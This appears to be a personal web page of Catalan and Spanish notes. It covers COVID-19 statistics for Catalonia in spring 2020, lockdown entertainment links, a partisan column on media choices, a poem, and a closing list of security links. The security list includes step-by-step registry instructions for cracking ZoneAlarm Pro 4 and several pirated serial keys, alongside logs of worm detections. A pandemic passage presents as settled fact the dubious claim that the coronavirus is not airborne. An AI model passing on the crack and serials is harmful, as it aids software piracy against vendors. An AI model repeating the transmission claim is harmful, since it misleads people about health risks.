entre llits de crítics i semicrítics, que són fàcilment reconvertibles en crítics.
100 són aportats pels centres privats.
Sagrat Cor (Quiron Salut) : 12 habitualment
Tindrem 35.000 ingressats - el 5 ‰ de 7.000.000
Tindrem 21.000 morts - som 7 milions de catalans i suposem una tassa de mortalitat del 3 ‰ -
EFE diu 6 ‰
url
20200405 - url -
En les últimes setmanes el sistema sanitari ha fet un gran esforç i ha multiplicat per més de tres les seves capacitats.
Ara mateix hi ha 1.939 llits d'UCI a tot el país.
D'aquests, 1.500, un 75%, estan ocupats per pacients de Covid-19.
| Date | Cases | Nous | Deaths | Nous | % (1) | source
|
| 23/03/2020 | 7.864 | 1.939 | 399 | 94 | 5,07 |
ccma
|
| 24/03/2020 | 9.937 | 2.073 | 516 | 177 | 5,19 |
ccma
|
| 25/03/2020 | 11.592 | 1.655 | 672 | 156 | 5,79 | .
|
| 26/03/2020 | 12.940 | 1.348 | 880 | 208 | 6,80 | ccma
|
| 27/03/2020 | 14.263 | 1.324 | 1.070 | 190 | 7,50 | ccma +
isciii
|
| 28/03/2020 | 15.026 | 763 | 1.226 | 156 | 8,15 | ccma
|
| 29/03/2020 | 16.157 | 1.131 | 1.410 | 184 | 8,72 | isciii
|
| 30/03/2020 | 18.773 | 2.616 | 1.672 | 262 | 8,90 | ccma
|
| 31/03/2020 | 19.991 | 1.218 | 1.849 | 177 | 9,25 | ccma
|
| 01/04/2020 | 21.804 | 1.813 | 2.093 | 244 | 9,59 | ccma
|
| 02/04/2020 | 23.460 | 1.656 | 2.335 | 242 | 9,95 | ccma
|
| 03/04/2020 | 24.734 | 1.274 | 2.508 | 173 | 10,14 | ccma
|
| 04/04/2020 | 26.032 | 1.298 | 2.637 | 129 | 10,13 | ccma
|
| 05/04/2020 | 26.824 | 792 | 2.760 | 123 | 10,29 | ccma
|
| 06/04/2020 | 28.323 | 1.499 | 2.908 | 148 | 10,27 | ccma
|
| 07/04/2020 | 29.647 | 1.324 | 3.041 | 133 | 10,26 | ccma
|
| 08/04/2020 | 31.043 | 1.396 | 3.148 | 107 | 10,14 | ccma
|
| 09/04/2020 | 31.824 | 781 | 3.231 | 83 | 10,15 | ccma
|
| 10/04/2020 | 32.984 | 1.160 | 3.331 | 100 | 10,10 | ccma
|
| 11/04/2020 | 34.027 | 1.043 | 3.442 | 111 | 10,12 | ccma
|
| 12/04/2020 | 34.726 | 699 | 3.538 | 96 | 10,19 | ccma
|
| 13/04/2020 | 35.197 | 471 | 3.666 | 128 | 10,42 | ccma
|
| 14/04/2020 | 36.505 | 1.308 | 3.756 | 90 | 10,29 | ccma
|
| 15/04/2020 | 37.354 | 849 | 3.855 | 99 | 10,32 | ccma
|
| 16/04/2020 | 38.316 | 962 | 4.056 | 201 | 10,21 | ccma
|
| 17/04/2020 | 39.943 | 1.627 | 4.123 | 67 | . | ccma
|
| 18/04/2020 | 40.600 | 657 | 4.336 | 280 | . | LV
|
| 19/04/2020 | 41.676 | 1.076 | 4.576 | 240 | . | ElP
|
| 20/04/2020 | 43.112 | 1.436 | 4.904 | 328 | . | ccma
|
| 21/04/2020 | 43.802 | 690 | 5.080 | 176 | . | ccma
|
| 22/04/2020 | 44.892 | 1.090 | 5.290 | 210 | . | ccma
|
| 23/04/2020 | 45.544 | 652 | 5.396 | 106 | .
|
| 24/04/2020 | 46.261 | 717 | 5.558 | 162 | . | ccma
|
| 25/04/2020 | 47.755 | 944 | 5.685 | 127 | . | ccma
|
| 26/04/2020 | 48.158 (50.162) | 403 (1.074) | 5.769 | 84 | . | ccma
|
| 27/04/2020 | 48.654 | 496 (1.510) | 5.835 | 66 | . | ccma
|
| 28/04/2020 | 48.916 | 262 | 5.897 | 62 | . | .
|
| 29/04/2020 | 55.137 (PCR) | . | 5.952 | 55 | . | ccma
|
| 01/05/2020 | 57.093 PCR+ | . | 5.987 | 35 | . | ccma
|
| 02/05/2020 | 57.363 | 270 | 6.034 | 47 | . | ccma
|
| 03/05/2020 | 50.366/57.506 | 132/143 | 6.094 | 60 | . | ccma
|
| 04/05/2020 | 50.771/58.559 | 405 | 6.153 | 59 | .
|
| 05/05/2020 | 50.924 | 153 | 6.247 | 94 | . | ccma
|
| 06/05/2020 | 51.190 | 266 | 6.286 | 39 | . | ccma
|
| 07/05/2020 | 60.007 | 386 | 6.344 | 58 | . | ccma
|
| 08/05/2020 | 60.404 | 397 | 6.375 | 31 | . | beteve
|
| 09/05/2020 | 60.605 | 201 | 6.408 | 33 | . | ccma
|
| 10/05/2020 | 60.728 | 123 | 6.423 | 15 | . | beteve
|
| 11/05/2020 | 60.976 | 248 | 6.455 | 32 | . | beteve, ccma
|
| 12/05/2020 | 61.355 | 379 | 6.485 | 30 | . | ccma
|
| 13/05/2020 | 61.677 | 322 | 6.510 | 25 | . | ccma
|
| 14/05/2020 | 62.615 | 938 | 6.536 | 26 | .
|
| 15/05/2020 | 63.114 | 499 | 6.557 | 21 | . | beteve, ccma
|
| 16/05/2020 | 63.339 | 225 | 6.572 | 15 | . | ccma
|
| 17/05/2020 | 63.441 | 102 | 6.595 | 23 | . | ccma
|
| 18/05/2020 | 63.441 -> 60.148 | -3.293 (1) | 6.614 | 19 | . | ccma
|
| 19/05/2020 | 62.978 | 52 | 6.385 | . | . | beteve
|
| 20/05/2020 | 63.259 | 61 | 6.541 | . | . | .
|
(1) aquesta dada inferior es deu a un error sistemàtic per part d’un hospital de Barcelona a l’hora de reportar les dades
Com es compten ?
Les xifres de Sanitat, però, només inclouen les defuncions dels casos positius
i deixen fora els morts en residències o domicilis als quals no s'ha fet la prova.
És per això que el Ministeri de Justícia ha demanat als registres civils que informin
de les llicències d'enterrament fetes des de l'entrada en vigor de l'estat d'alarma
per tenir una informació "objectiva i veraç" sobre el nombre de morts per coronavirus.
Compte amb els vellets :
ccma
Aixi, el 16/04/2020 es diu :
Els morts per coronavirus a Catalunya són gairebé el doble, 7.097, amb el nou recompte de Salut.
Aquesta xifra pràcticament duplica la que es coneixia fins ara:
aquest dimarts, la dada de defuncions totals era de 3.756.
-
url
Per països
A dia 9/4 a la
url trobo :
| Pais | Habitants | Casos | Ratio | Morts | Ratio
|
| EEUU | 327 M | 435.160 | 1,33 | 15.708 | 48
|
| Spain | 44 M | 152.446 | 3,45 | 15.238 | 364
|
| Italy | 60 M | 139.422 | 2,3 | 17.669 | 294
|
| Germany | 83 M | 113.422 | 1,36 | 2.349 | 28
|
| France | 67 M | 112.950 | 1,67 | 10.869 | 162
|
| UK | 67 M | 84.279 | 1,26 | 10.612 | 158
|
| Portugal | 10 M | 13.141 | 1,3 | 409 | 40
|
Mutacions
Uapo : NextStrain -
software tool
Dates covid
La seqüencia ha estat
- estat d'alarma : el 18 de Març
- confinament total : del 30 de Març fins el 12 de Abril
- prorroga confinament : fins el 22 de Abril
- 18/04 - prroroga confinament fins el 9 de Maig
Estadistiques de morts 2020 versus 2019
INE :
Año 2018 - número de defunciones = 427.721
What to do
- gimnastica
- Liceu
- Metropolitan week
- UNESCO Biblioteca Digital Mundial
-
100 películas completas en castellano
- Por si alguien se aburre y no sabe con qué entretenerse en casa, hay en marcha una serie de iniciativas:
- la editorial Hearst España ofrece sus revistas online:
10 minutos, harper’s bazaar, esquire, que me dices, elle, Cosmopolitan,
mi casa, nuevo estilo, men’s/women’s health, fotogramas ...
url
- festival me quedo en casa y cuarentena fest:
muchos artistas a través de sus perfiles de Instagram
harán directos de unos 30 min como si de un concierto acustico privado se tratase.
Los horarios:
url,
url
- se puede también ver teatro online, estas son las obras disponibles:
url
- algunos autores, como el dibujante de comics El Torres o los autores de El bosque
han subido todos sus libros/comicsgratis pa quien los quiera disfrutar :
url,
url
- Movistar lite estará durante un mes gratis debido al coronavirus
url
- la empresa italiana de videojuegos runehead
ha subido un montón de keys gratis para todos sus juegos en steamy otras plataformas -
url
url
- si eres socio de la biblioteca tienes la posibilidad de acceder al catálogo de efilm,
un Netflix de las biblios, cada comunidad tiene su propio catálogo:
url
- para los que teletrabajan, pccomponentes ofrece asistencia remota gratuita
si les envias un certificado de empresa de que estas teletrabajando :
url
- el
museo del Prado, el
reina Sofia y el
Thyssen
ofrecen contenido audiovisual y explicación de cuadros a través de sus webs
- la editorial Perrolokogames libera su juego de mesa dirty fridge en pdf
para quien quiera imprimirlo y ponerse a jugar -
url
- 10 museos para visitar estando en casa: tour virtual y colecciones online.
- 1. Pinacoteca di Brera - Milano -
url
- 2. Galleria degli Uffizi - Firenze -
url
- 3. Musei Vaticani - Roma -
url
- 4. Museo Archeologico - Atene -
url
- 5. Prado - Madrid -
url
- 6. Louvre - Parigi -
url
- 7. British Museum - Londra -
url
- 8. Metropolitan Museum - New York -
url
- 9. Hermitage - San Pietroburgo -
url
- 10. National Gallery of art - Washington -
url
- teatroTeca
url
- Revistas digitales sin coste!
- quant trigues en pulsar del 1 al 50
- 10-19 segundos: imposible
- 20-29 segundos: mentiroso
- 30-39 segundos: eres especial
- 40-59 segundos: experto
- 60-79 segundos: normal {SAG 62}
- 80-99 segundos: te estás haciendo viejo
- más de 100 segundos: eres viejo
- tira fletxes a les pomes
- escape room
- VK music
- fmovies
- byte FM
- 24 cursos online gratis y en español de 5 de las mejores universidades del mundo
- Instituto Tecnológico de Massachusetts (MIT) - Nº1 en QS / Nº5 en THE - Entrepreneurship 101: ¿Quién es tu cliente?
- Entrepreneurship 102: ¿Qué puedes hacer por tu cliente?
- Evaluación de impacto de programas sociales
- Universidad de Stanford - Nº2 en QS / Nº4 en THE - Aprendizaje automático
- Cómo aprender matemáticas: para estudiantes
- Curso corto sobre lactancia materna
- Introducción a la alimentación y salud
- Introducción a la lógica
- Monitoreo de bosques con CLASlite
- Nutrición infantil y cocina
- Salud en el espectro de género
- Universidad de Princeton - Nº6 en THE / Nº13 en QS - Altruismo efectivo
- Budismo y psicología moderna
- Universidad de Yale - Nº8 en THE / Nº17 en QS - Arquitectura romana
- Era de las catedrales
- Fundamentos morales de la política
- Introducción a la música clásica
- Introducción a la psicología
- La ciencia del bienestar
- Mercados financieros
- Moralidades de la vida cotidiana
- Paternidad cotidiana: el ABC de la crianza de hijos
- Un viaje a través del cristianismo occidental: de la fe perseguida a la religión global (200 - 1650)
- Escuela Imperial de Londres - Nº9 en QS / Nº10 en THE - Matemáticas para el aprendizaje automático: cálculo multivariante
- M.I.T. ofrece abierto con acceso completo, público y gratuito todas sus revistas académicas :
noticia ,
disponibles a través de
MIT Press Journals (gone),
Direct to Open , as
Computer Music Journal ,
Evolutionary Computation
- Tricicle online
- que fer - bona llista
- veure vols en directe : FlightWare o
Flight Radar 24
Vaixells : Marine Traffic
Vent, onades, etc : Windy
- escoltar la radio :
Radio Paradise
- fer un test de nivell de catala
vocabulari
o de angles
via TED o
rus
- concerts rock
One of the fastest ways you can profoundly change your life is to rid yourself of toxic people. Bryant McGill.
Compra / Venda on-line
Per comprar directe :
Venda directe
Alfons Duran
En el espacio interior, el más íntimo, merece la pena recuperar los viejos archivos, aquellas lecturas abandonadas,
los juegos aplazados, las meditaciones atemporales, los guiños cómplices.
Es bueno darse cuenta, en situaciones como ésta, quien de verdad te importa y quién no.
Es una perfecta ocasión para hacer un reset en tu vida. No pierdas esta oportunidad.
Habla con tus seres queridos, con tus amigos (los que queden después del cribado), con los vecinos que comparten tus sentimientos.
Las tecnologías de la información y la comunicación lo hacen posible.
Evita las redes sociales abiertas, donde abunda la basura.
Se muy riguroso con tu acopio de información.
De las televisiones generalistas, limítate a los titulares del telenoticias de TV3.
Solo a los titulares, a no ser que quieras atragantarte con un completo “televirus”.
Mejor al mediodía que por la noche, pues a esa hora conviene relajarse con series inteligentes y amigables como “Friends”.
Es el mejor tranquilizante. Una segunda opción es el informativo de Betevé de la tarde, que conduce Xavier Muixí.
Olvídate del paquete del Régimen (la 1, la 2, Antena 3, Telecinco y sus derivadas),
a no ser que practiques las fórmulas sado-masoquistas, en cuyo caso espero que lo disfrutes.
Como estás confinado, te ahorras la compra de la prensa de papel.
Tienes los digitales, pero has de ser muy autoexigente.
Si eres lector asiduo de la caverna mediática madrileña (sin excepciones), te has equivocado al leer esta columna.
Para mí son bazofia.
Deshecha la Vanguardia y el Periódico, genuinos representantes del españolismo más cutre y provinciano.
Tienes los digitales de
el Punt-Avui i
el Ara (éste con algunos reparos + JSM +
Antoni Bassas).
Tienes
Vilaweb (del formidable Vicens Partal, con Barnils, Resina y otros)
y
el Nacional (en el que Josep Antich y su equipo están haciendo un magnífico trabajo).
Tienes el Món, la República, L’Unilateral, Nació Digital, Crític y Directa.
Entre los digitales madrileños (asumiendo un cierto sesgo capitalino) tienes Público (y su variante catalana Públic), elDiario.es, Diario16 y nada más.
Insisto: nada más, por si tienes algunas dudas.
Historia
La pesta negra va matar dos-cents milions de persones.
La pandèmia de la verola en va matar cinquanta-sis.
La febre espanyola va matar entre quaranta milions i cinquanta milions de persones, ara fa cent anys.
La sida n’ha mortes entre vint-i-cinc i trenta-cinc.
De moment hi ha quinze pandèmies que han mort molta més gent que la Covid-19.
En canvi, i això és el que crec important, cap no ha tingut els efectes d’aquesta que vivim, la paralització global del planeta.
Esperanza (Alexis Valdes)
Cuando la tormenta pase y se amansen los caminos y seamos sobrevivientes de un naufragio colectivo.
Con el corazón lloroso y el destino bendecido nos sentiremos dichosos tan sólo por estar vivos.
Y le daremos un abrazo al primer desconocido y alabaremos la suerte de conservar un amigo.
Y entonces recordaremos todo aquello que perdimos y de una vez aprenderemos todo lo que no aprendimos.
Ya no tendremos envidia pues todos habrán sufrido. Ya no tendremos desidia seremos más compasivos.
Valdrá más lo que es de todos que lo jamás conseguido. Seremos más generosos y mucho más comprometidos.
Entenderemos lo frágil que significa estar vivos. Sudaremos empatía por quien está y quien se ha ido.
Extrañaremos al viejo que pedía un peso en el mercado, que no supimos su nombre y siempre estuvo a tu lado.
Y quizás el viejo pobre era tu Dios disfrazado. Nunca preguntaste el nombre porque estabas apurado.
Y todo será un milagro Y todo será un legado. Y se respetará la vida, la vida que hemos ganado.
Cuando la tormenta pase te pido Dios, apenado, que nos devuelvas mejores, como nos habías soñado.
Transmision
Los científicos del Instituto alemán de Virología de la universidad de Bonn han concluido que
la transmisión más común entre personas se presenta “durante contactos largos y estrechos de multitudes,
mientras que el riesgo de contagio mediante el contacto con objetos no es alto,
dado que el coronavirus es muy susceptible a la desecación, por lo que no se puede transmitir por el aire”.
covid urls
Al costat de la corona hi ha ...
Corinna
Vist que avui les guerres ja no es fan amb tancs ni canons, potser cal plantejar-se invertir menys en armament i molt més en sanitat i investigació
Links
- uSoft
security bulletins updates summary (Dec 2004) ...
All
bulletins
- http://www.malwarebytes.org/ -
removes all forms of malware, including viruses, Trojans, spyware, adware and rootkits.
- Fonts de Bombers, Troyans, etc
- Antivirus :
URL ;
top 10 2011 ;
- Get some
- SSH crc32
analysis
- Sylvio home, Phrack usual.
- Nice links
page :
"lsass.exe terminated, system will shutdown"
- Spend some time
- Dangerous
site :
instala HobbyHacker(241-hobby-1-0-#3).exe
- Span tree
by
- Subscribe
teens
- Closed ? [wzor]
- svchost.exe description :
- Zone Alarm Pro 4 crack :
Slow !
Close ZoneAlarm.
Open up your registry editor [regedit or regedt32].
Go to the following key:
HKEY_CURRENT_USER\Software\Zone Labs\ZoneAlarm
In the right pane, you will see CfgMain, double click that.
Use your keyboard's arrow keys to downwards until you reached 0028.
On line #6 (0028), press the right arrow key 5 times, then hit Backspace.
After you are done the step above, type 00 on your keyboard.
Then click OK.
Restart ZoneAlarm...
Try
m64m2-235hf-aiga7-f63xau-7acpq0
and
38cti-bqf8g-x9jnr-tfth7c-3iuS40
Lunatic (IE only)
says [4.5.538] :
fkqtv rm9b1 vi0kj 5c4wc1 783ac0
Prog (2.6.84) +
serial
- 11/06/03 : trojan scan from 9.172.200.135:2170, SPA87844:WORKGROUP
- 17/02/05 :
Al carregar la pàgina
http://www.crackz.ws/k1.htm
m'intenta executar ... cmb_243461.exe
- Tinc
- WORM_NETSKY.B in information.zip
- WORM_NETSKY.B in misc.zip
- WORM_NETSKY.B in msg.com
- WORM_NETSKY.B in nomoney.pif
- WORM_NETSKY.B in note.rtf.pif in note.zip
- WORM_NETSKY.B in object.com
- WORM_NETSKY.B in product.htm.pif in product.zip
- WORM_NETSKY.B in topseller.zip
- WORM_NETSKY.B in stuff.scr in stuff.zip
- WORM_NETSKY.B in me.com in me.zip
- WORM_NETSKY.B in nomoney.exe
- TEEKIDS.EX al P4 (c:\windows\system32\ !)
- Trend Micro
- OpenRCE :
WinEggDropShell injects a DLL into the winlogon.exe process.
The DLL is packed by EXE32Pack v1.38 on top of Aspack.
Tell OllyDbg this is an executable, not a DLL.
Load our target DLL into Stud_PE (Hex Viewer).
-
Virus Total : análisis de ficheros.
Virus Total : send them suspicious files ....
- Tools
- 19/10/2007 : uSoft actually recommends the following malware scanning (free) tools:
- avast! Virus cleaner
- McAfee AVERT Stinger
- Malicious Software Removal Tool (MS)
- Spybot - Search & Destroy
- SpamThru : has own
AntiSpam
- Detector de bots : RUBotted
- AV
comparatives
- A la Dipu tenen ...
StuxNet !
- Nicole says (20130405) :
This is a
comprehensive guide on network security
from Answers.com's networking expert Chad Williamson
- passaport covid :
get pwd + login la meva salut
- skimming - recollida de dades de tarjes bancaries
- Chrome te "Configuracion" + "Avanzada" + "Recuperar ajustes y borrar" + "Limpiar ordenador"
- Morris worm, 1988
- Google i
All The Web
- Tinet
- Back to main page
- Site map